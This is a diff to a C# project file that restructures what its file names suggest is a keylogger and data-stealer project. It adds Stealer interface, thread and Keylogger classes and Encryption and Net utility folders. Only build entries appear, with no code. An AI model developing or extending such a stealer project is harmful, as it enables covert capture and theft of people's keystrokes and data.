--- a/sub/sub.csproj
+++ b/sub/sub.csproj
@@ -42,10 +42,18 @@
     <Reference Include="System.Xml" />
   </ItemGroup>
   <ItemGroup>
-    <Compile Include="Keylogger.cs" />
+    <Compile Include="IStealer.cs" />
+    <Compile Include="OldKeylogger.cs" />
     <Compile Include="Program.cs" />
     <Compile Include="Properties\AssemblyInfo.cs" />
     <Compile Include="Settings.cs" />
+    <Compile Include="Stealers\Keylogger.cs" />
+    <Compile Include="StealerThread.cs" />
+  </ItemGroup>
+  <ItemGroup>
+    <Folder Include="Util\Encryption\" />
+    <Folder Include="Util\Extensions\" />
+    <Folder Include="Util\Net\" />
   </ItemGroup>
   <Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
   <!-- To modify your build process, add your task inside one of the targets below and uncomment it. 
